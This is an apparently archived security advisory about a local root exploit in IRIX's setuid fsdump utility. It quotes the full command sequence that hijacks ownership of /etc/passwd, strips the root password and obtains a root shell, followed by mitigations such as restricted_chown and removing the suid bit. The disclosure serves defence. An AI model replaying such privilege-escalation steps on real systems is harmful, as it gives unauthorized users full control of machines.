COMMAND

    /var/rfindd/fsdump

SYSTEMS AFFECTED

    IRIX 5.x, 6.0, 6.0.1, 6.1, 6.2

PROBLEM

    The   fsdump   program   is   found   in   the  eoe.sw.rfindd  and
    eoe2.sw.rfindd  subsystems  which  are  not  installed by default.
    As  optional  subsystems,  these   packages  must  be   explicitly
    installed for use.  Only systems with  the fsdump program  present
    are vulnerable.

    Chris Sheldon <csh@VIEWGRAPHICS.COM> has found yet another IRIX 5.3
    root exploit.   Of course,  the major  problem here  is that  IRIX
    allows users to give away  ownership of files.  Without that, this
    could only be used for  changing the permissions on a file so that
    you could read and modify it.

        The system (an Indy):
        IRIX irix 5.3 11091812 IP22 mips

        irix% ls -la /var/rfindd/fsdump
        ---s--x--x    1 root     sys        62032 Jul 25  1995 /var/rfindd/fsdump

    What tipped Chris off that it was exploitable was the fact that it
    was a protected suid binary (---s--x--x).  In his words: "I thought:
    if someone at SGI is being careful to not let non-root users  read
    the binary, then it *must* be packed with holes... :-)"

    So, I'm just a normal user today...

        irix% id
        uid=1799(csh) gid=500(users)

        irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
        (count to three, and hit ctrl-c)

        irix% ls -la /etc/passwd
        -rw-r--r--    1 csh      users        956 Feb 25 06:23 /etc/passwd

    And now I've got root access...

        irix% tail -8 /etc/passwd
        nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
        noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
        nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null

        Tue Feb 25 06:23:48 PST 1997
        Number of inodes total 208740; allocated 31259
        Collecting garbage.
        interrupted

    All you have to do is edit  the garbage off the end of the  passwd
    file, delete the encrypted root password and restore the  original
    ownership of the passwd file.

        irix% vi /etc/passwd            # remove the encrypted root password
        irix% chgrp sys /etc/passwd
        irix% chown root /etc/passwd
        irix% su -
        irix#

    This can  be used  to take  over pretty  much any file  on the system,
    whatever user or group currently owns it...

SOLUTION

    Larry Glaze <lglaze@MC2-CSR.COM> suggested  removing the file
    giveaway privilege:

        pandora 2# systune -i
        Updates will be made to running system and /unix.install
        systune-> restricted_chown 1
                restricted_chown = 1 (0x1)
                Do you really want to change restricted_chown to 1 (0x1)?  (y/n) y

    In order for  the change in  parameter restricted_chown to  become
    effective, reboot the system

        systune->q
        pandora 3# /etc/reboot

    Another solution is to remove the fsdump subsystem entirely; it is
    about as useless (and unused) as any piece of  software could  be.
    Removing the suid bit from the binary closes the hole as well.  No
    patches are available.   SGI supports  the idea  of changing  the
    permissions or removing the entire package from the system.